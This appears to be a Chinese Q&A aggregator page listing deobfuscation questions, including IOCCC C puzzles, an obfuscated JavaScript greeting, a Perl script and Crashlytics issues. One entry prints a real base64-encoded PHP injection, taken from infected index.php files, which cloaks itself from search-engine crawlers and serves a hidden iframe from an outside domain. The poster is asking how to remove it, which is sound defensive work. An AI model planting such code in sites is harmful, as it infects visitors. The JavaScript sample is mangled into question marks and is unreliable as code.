那些遇到过的问题

标签: deobfuscation

混淆的C代码竞赛2006.请解释sykes2.c

这个C程序如何工作?

main(_){_^448&&main(-~_);putchar(--_%64?32|-~7[__TIME__-_/8%8][">'txiZ^(~z?"-48]>>";;;====~$::199"[_*2&8|_/64]/(_&2?1:8)%8&1:10);}
Run Code Online (Sandbox Code Playgroud)

它按原样进行编译(测试gcc 4.6.3).它打印编译时的时间.在我的系统上:

    !!  !!!!!!              !!  !!!!!!              !!  !!!!!! 
    !!  !!  !!              !!      !!              !!  !!  !! 
    !!  !!  !!              !!      !!              !!  !!  !! 
    !!  !!!!!!    !!        !!      !!    !!        !!  !!!!!! 
    !!      !!              !!      !!              !!  !!  !! 
    !!      !!              !!      !!              !!  !!  !! 
    !!  !!!!!!              !!      !!              !!  !!!!!!
Run Code Online (Sandbox Code Playgroud)

资料来源:sykes2 - 一行中的一个时钟,sykes2作者提示

一些提示:默认情况下没有编译警告.编译时-Wall,会发出以下警告:

sykes2.c:1:1: warning: return type defaults to ‘int’ [-Wreturn-type]
sykes2.c: In function ‘main’:
sykes2.c:1:14: warning: value …
Run Code Online (Sandbox Code Playgroud)

c obfuscation deobfuscation

cor*_*rny
2015 01-22
963
推荐指数
4
解决办法
8万
查看次数

这四行棘手的C代码背后的概念

为什么这段代码会输出C++Sucks?它背后的概念是什么?

#include <stdio.h>

double m[] = {7709179928849219.0, 771};

int main() {
    m[1]--?m[0]*=2,main():printf((char*)m);    
}
Run Code Online (Sandbox Code Playgroud)

在这里测试一下.

c deobfuscation

cod*_*er1
2014 07-17
381
推荐指数
8
解决办法
4万
查看次数

这个神奇的Javascript如何工作?

这是一个警告"Hello world"的小javascript:

????=/??´??~???//*´??*/['_'];o=(???)=_=3;c=(???)=(???)-(???);(???)=(???)=(o^_^o)/(o^_^o);(???)={???:'_',????:((????==3)+'_')[???],????:(????+'_')[o^_^o-(???)],????:((???==3)+'_')[???]};(???)[???]=((????==3)+'_')[c^_^o];(???)['c']=((???)+'_')[(???)+(???)-(???)];(???)['o']=((???)+'_')[???];(?o?)=(???)['c']+(???)['o']+(????+'_')[???]+((????==3)+'_')[???]+((???)+'_')[(???)+(???)]+((???==3)+'_')[???]+((???==3)+'_')[(???)-(???)]+(???)['c']+((???)+'_')[(???)+(???)]+(???)['o']+((???==3)+'_')[???];(???)['_']=(o^_^o)[?o?][?o?];(???)=((???==3)+'_')[???]+(???).????+((???)+'_')[(???)+(???)]+((???==3)+'_')[o^_^o-???]+((???==3)+'_')[???]+(????+'_')[???];(???)+=(???);(???)[???]='\\';(???).????=(???+???)[o^_^o-(???)];(o???o)=(????+'_')[c^_^o];(???)[?o?]='\"';(???)['_']((???)['_'](???+(???)[?o?]+(???)[???]+(???)+(???)+(???)+(???)[???]+(???)+((???)+(???))+(???)+(???)[???]+(???)+(???)+((???)+(???))+(???)[???]+(???)+((o^_^o)+(o^_^o))+((o^_^o)-(???))+(???)[???]+(???)+((o^_^o)+(o^_^o))+(???)+(???)[???]+((???)+(???))+(c^_^o)+(???)[???]+(???)+((o^_^o)-(???))+(???)[???]+(???)+(???)+(c^_^o)+(???)[???]+(???)+(???)+((???)+(???))+(???)[???]+(???)+((???)+(???))+(???)+(???)[???]+(???)+((???)+(???))+(???)+(???)[???]+(???)+((???)+(???))+((???)+(o^_^o))+(???)[???]+(???)+(c^_^o)+(???)[???]+(???)+((o^_^o)-(???))+((???)+(o^_^o))+(???)[???]+(???)+((???)+(???))+((???)+(o^_^o))+(???)[???]+(???)+((o^_^o)+(o^_^o))+((o^_^o)-(???))+(???)[???]+(???)+((???)+(???))+(???)+(???)[???]+(???)+(???)+(???)+(???)[???]+(???)+((o^_^o)-(???))+(???)[???]+((???)+(???))+(???)+(???)[?o?])(???))('_');
Run Code Online (Sandbox Code Playgroud)

好看的版本:

???? = /??´??~???//*´??*/['_'];
o = (???) = _ = 3;
c = (???) = (???) - (???);
(???) = (???) = (o^_^o)/(o^_^o);
(???) = {
  ???:  '_',
  ????: ((????==3)+'_')[???],
  ????: (????+'_')[o^_^o-(???)],
  ????: ((???==3)+'_')[???]
};
(???)[???] = ((????==3)+'_')[c^_^o];
(???)['c'] = ((???)+'_')[(???)+(???)-(???)];
(???)['o'] = ((???)+'_')[???];
(?o?)=(???)['c'] + (???)['o'] + (???? + '_')[???] + ((????==3) + '_')[???] + ((???) + '_')[(???) + (???)] + ((???==3) + '_')[???] + ((???==3) + '_')[(???) - (???)] + (???)['c'] + ((???) + '_')[(???) …
Run Code Online (Sandbox Code Playgroud)

javascript obfuscation deobfuscation

Tru*_*gDQ
2019 05-13
65
推荐指数
3
解决办法
5116
查看次数

如何正确deobfusacte Perl脚本?

我正在尝试反混淆以下Perl代码(源代码):

#!/usr/bin/perl
(my$d=q[AA                GTCAGTTCCT
  CGCTATGTA                 ACACACACCA
    TTTGTGAGT                ATGTAACATA
      CTCGCTGGC              TATGTCAGAC
        AGATTGATC          GATCGATAGA
          ATGATAGATC     GAACGAGTGA
            TAGATAGAGT GATAGATAGA
              GAGAGA GATAGAACGA
                TC GATAGAGAGA
                 TAGATAGACA G
               ATCGAGAGAC AGATA
             GAACGACAGA TAGATAGAT
           TGAGTGATAG    ACTGAGAGAT
         AGATAGATTG        ATAGATAGAT
       AGATAGATAG           ACTGATAGAT
     AGAGTGATAG             ATAGAATGAG
   AGATAGACAG               ACAGACAGAT
  AGATAGACAG               AGAGACAGAT
  TGATAGATAG             ATAGATAGAT
  TGATAGATAG           AATGATAGAT
   AGATTGAGTG        ACAGATCGAT
     AGAACCTTTCT   CAGTAACAGT
       CTTTCTCGC TGGCTTGCTT
         TCTAA CAACCTTACT
           G ACTGCCTTTC
           TGAGATAGAT CGA
         TAGATAGATA GACAGAC
       AGATAGATAG  ATAGAATGAC
     AGACAGAGAG      ACAGAATGAT
   CGAGAGACAG          ATAGATAGAT
  AGAATGATAG             ACAGATAGAC
  AGATAGATAG               ACAGACAGAT
  AGACAGACTG                 ATAGATAGAT
   AGATAGATAG                 AATGACAGAT
     CGATTGAATG               ACAGATAGAT
       CGACAGATAG             ATAGACAGAT
         AGAGTGATAG          ATTGATCGAC
           TGATTGATAG      ACTGATTGAT …
Run Code Online (Sandbox Code Playgroud)

perl deobfuscation

Bio*_*eek
2016 01-17
55
推荐指数
1
解决办法
2142
查看次数

如何摆脱像PHP病毒文件一样的eval-base64_decode?

我的网站(非常大的社区网站)最近感染了病毒.每个index.php文件都被更改,以便将这些文件的开头php标记更改为以下行:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));
Run Code Online (Sandbox Code Playgroud)

当我解码它时,它产生了以下PHP代码:

    <?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0"  ,"64.68.87.255"  ),
    array("66.102.0.0",  "66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0", "66.249.95.255"),
    array("72.14.192.0", "72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){ …
Run Code Online (Sandbox Code Playgroud)

php security virus malware-detection deobfuscation

fra*_*bit
2016 05-27
36
推荐指数
2
解决办法
6万
查看次数

Firebase Crashlytics:上传缺少的dSYM以查看1个版本的崩溃.(iOS)

错误消息: 上传缺少的dSYM以查看1个版本的崩溃.受影响的版本:1.0(1)

我正在尝试在我的iOS项目中实现Firebase Crashlytics.我根据Firebase Crashlytics Doucmentation进行了所有设置.单击按钮时手动执行崩溃,以查看崩解是否正常.

@IBAction func onTestCrashButtonClick(_ sender: UIButton) {

    Crashlytics.sharedInstance().crash()

}
Run Code Online (Sandbox Code Playgroud)

但是当我试图在firebase控制台中看到错误报告时,它会显示类似这样的图像.

在此输入图像描述

阅读Get Deobfuscated崩溃报告之后,我只需将调试信息格式设置为DWARF,dSYM文件如下所示,但问题直到现在才得到修复. 在此输入图像描述

ios deobfuscation firebase crashlytics

jaz*_*bpn
2018 01-17
23
推荐指数
10
解决办法
1万
查看次数

为什么使用'function address == NULL'而不是'false'?

在一些遗留代码中浏览我发现了这样的功能:

static inline bool EmptyFunc()
{
    return (void*) EmptyFunc == NULL;
}
Run Code Online (Sandbox Code Playgroud)

与此有什么不同:

static inline bool EmptyFunc()
{
    return false;
}
Run Code Online (Sandbox Code Playgroud)

这段代码是为了在几个不同的平台上编译而创建的,比如PS2,Wii,PC ......有没有理由使用第一个函数?喜欢更好的优化还是避免一些奇怪的编译器错误行为?

c c++ deobfuscation

Vyt*_*ius
2017 04-16
22
推荐指数
1
解决办法
439
查看次数

如何使用映射文件对 Android 堆栈跟踪进行反混淆处理

我从崩溃报告系统得到了一个堆栈跟踪,它被混淆了,比如

... 解析失败:Lru/test/c/b/a;...

我有一个映射文件。

如何使用 mapping.txt 对该堆栈跟踪进行反混淆?

obfuscation android proguard deobfuscation

Mak*_*aev
2019 05-07
18
推荐指数
2
解决办法
1万
查看次数

理解main的一个不常见的参数

在大学编程竞赛中提出了以下问题.我们被要求猜测输出和/或解释它的工作原理.不用说,我们都没有成功.

main(_){write(read(0,&_,1)&&main());}
Run Code Online (Sandbox Code Playgroud)

一些简短的谷歌搜索引导我到这个确切的问题,问codegolf.stackexchange.com:

https://codegolf.stackexchange.com/a/1336/4085

在那里,它解释它的作用:Reverse stdin and place on stdout但不是如何.

我也在这个问题上找到了一些帮助:主要的三个论点,以及其他混淆的技巧, 但它仍然没有解释如何main(_),&_并且&&main()有效.

我的问题是,这些语法如何工作?它们是我应该知道的,因为它们仍然相关吗?

如果不是直接的答案,我会感激任何指针(资源链接等).

c argument-passing deobfuscation

Rau*_*akS
2017 05-23
17
推荐指数
2
解决办法
1309
查看次数

对Javascript代码进行去混淆,使其再次可读

我讨厌把这个带到这里,在学习混淆JS代码时,我编码了我的代码,然后在没有任何备份的情况下编写了原始代码:)以下是我的混淆代码. 

var _0xf17f=["\x28","\x29","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x53\x74\x75\x64\x65\x6E\x74\x5F\x6E\x61\x6D\x65","\x73\x74\x75\x64\x65\x6E\x74\x5F\x64\x6F\x62","\x3C\x62\x3E\x49\x44\x3A\x3C\x2F\x62\x3E","\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x2F\x6C\x65\x61\x72\x6E\x69\x6E\x67\x79\x69\x69\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x3F\x72\x3D\x73\x74\x75\x64\x65\x6E\x74\x2F\x76\x69\x65\x77\x26\x61\x6D\x70\x3B\x20\x69\x64\x3D","\x22\x3E","\x3C\x2F\x61\x3E","\x3C\x62\x72\x2F\x3E","\x3C\x62\x3E\x53\x74\x75\x64\x65\x6E\x74\x20\x4E\x61\x6D\x65\x3A\x3C\x2F\x62\x3E","\x3C\x62\x3E\x53\x74\x75\x64\x65\x6E\x74\x20\x44\x4F\x42\x3A\x3C\x2F\x62\x3E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x63\x6C\x61\x73\x73","\x76\x69\x65\x77","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x70\x72\x65\x70\x65\x6E\x64","\x2E\x69\x74\x65\x6D\x73","\x66\x69\x6E\x64","\x23\x53\x74\x75\x64\x65\x6E\x74\x47\x72\x69\x64\x56\x69\x65\x77\x49\x64"];function call_func(_0x41dcx2){var _0x41dcx3=eval(_0xf17f[0]+_0x41dcx2+_0xf17f[1]);var _0x41dcx4=document[_0xf17f[3]](_0xf17f[2]);var _0x41dcx5=_0x41dcx3[_0xf17f[4]];var _0x41dcx6=_0x41dcx3[_0xf17f[5]];var _0x41dcx7=_0x41dcx3[_0xf17f[6]];var _0x41dcx8=_0xf17f[7];_0x41dcx8+=_0xf17f[8]+_0x41dcx5+_0xf17f[9]+_0x41dcx5+_0xf17f[10];_0x41dcx8+=_0xf17f[11];_0x41dcx8+=_0xf17f[12];_0x41dcx8+=_0x41dcx6;_0x41dcx8+=_0xf17f[11];_0x41dcx8+=_0xf17f[13];_0x41dcx8+=_0x41dcx7;_0x41dcx8+=_0xf17f[11];_0x41dcx4[_0xf17f[14]]=_0x41dcx8;_0x41dcx4[_0xf17f[17]](_0xf17f[15],_0xf17f[16]);$(_0xf17f[21])[_0xf17f[20]](_0xf17f[19])[_0xf17f[18]](_0x41dcx4);} ;
Run Code Online (Sandbox Code Playgroud)

任何人都可以指导我的URL或任何方法,使其可读.我是通过这个网站做到的,他们似乎在网站上提供了一种混淆服务...这是我在学习期间的测试代码,如果有人能帮助我,那将是非常好的.

javascript deobfuscation

Fai*_*han
2012 10-17
16
推荐指数
3
解决办法
8万
查看次数

标签 统计

deobfuscation ×10

c ×4

obfuscation ×3

javascript ×2

android ×1

argument-passing ×1

c++ ×1

crashlytics ×1

firebase ×1

ios ×1

malware-detection ×1

perl ×1

php ×1

proguard ×1

security ×1

virus ×1